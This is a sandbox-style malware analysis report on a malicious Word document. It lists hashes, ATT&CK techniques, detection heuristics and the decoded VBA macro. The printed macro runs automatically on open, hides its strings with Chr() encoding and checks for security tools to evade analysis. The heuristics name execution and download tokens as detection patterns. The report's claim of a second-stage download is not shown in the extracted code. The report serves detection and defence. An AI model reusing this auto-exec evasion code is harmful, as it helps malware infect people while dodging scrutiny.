Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 b425d25d9956b7e5…

MALICIOUS

Office (OOXML) / .DOCX

18.0 KB Created: 2026-05-08 15:48:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2026-06-12
MD5: 5defbd8b32023282b486fcf6ac085fb0 SHA-1: 89c29b11f0c7c84e086e563ebbee0e9f0904ed52 SHA-256: b425d25d9956b7e530fea68888eeb20061e9b8ac848b5e8ae08be2000d4d63b1
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious OOXML document containing a heavily obfuscated VBA macro. The macro's Document_Open subroutine attempts to execute 'tasklist' to detect security tools like Wireshark, Process Explorer, Process Monitor, and Sysinternals. If no security tools are detected, it proceeds to execute further commands, likely to download and run a second-stage payload. The use of CreateObject and Shell execution points to a downloader or dropper functionality.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        ' Create WScript.Shell object
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set objShell = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/2019/extlstIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2023/wordml/word16duIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlockIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1893 bytes
SHA-256: 35d75e7d35edee63f99a369a90aefad192bdc8b31c4be0c09678899b6ff77c43
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    On Error Resume Next
    
    Dim objShell As Object
    Dim objExec As Object
    Dim strCommand As String
    Dim strOutput As String
    Dim blnSecurityToolDetected As Boolean
    
    blnSecurityToolDetected = False
    
    ' Create WScript.Shell object
    Set objShell = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
    
    ' Execute command to list running processes
    strCommand = Chr(116) & Chr(97) & Chr(115) & Chr(107) & Chr(108) & Chr(105) & Chr(115) & Chr(116)
    Set objExec = objShell.Exec(strCommand)
    
    ' Read the output of the command
    strOutput = objExec.StdOut.ReadAll
    
    ' Check for security tools in the output
    If InStr(LCase(strOutput), Chr(119) & Chr(105) & Chr(114) & Chr(101) & Chr(115) & Chr(104) & Chr(97) & Chr(114) & Chr(107)) > 0 Or _
       InStr(LCase(strOutput), Chr(112) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(120)) > 0 Or _
       InStr(LCase(strOutput), Chr(112) & Chr(114) & Chr(111) & Chr(99) & Chr(109) & Chr(111) & Chr(110)) > 0 Or _
       InStr(LCase(strOutput), Chr(115) & Chr(121) & Chr(115) & Chr(105) & Chr(110) & Chr(116) & Chr(101) & Chr(114) & Chr(110) & Chr(97) & Chr(108) & Chr(115)) > 0 Then
        blnSecurityToolDetected = True
    End If
    
    ' If security tool is detected, halt execution
    If blnSecurityToolDetected Then
        Exit Sub
    End If
    
    ' Clean up
    Set objShell = Nothing
    Set objExec = Nothing
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 9728 bytes
SHA-256: cd00d57a41d8d0fda6a04e3541a50049233556b556070f2d33bb7330ac9239fd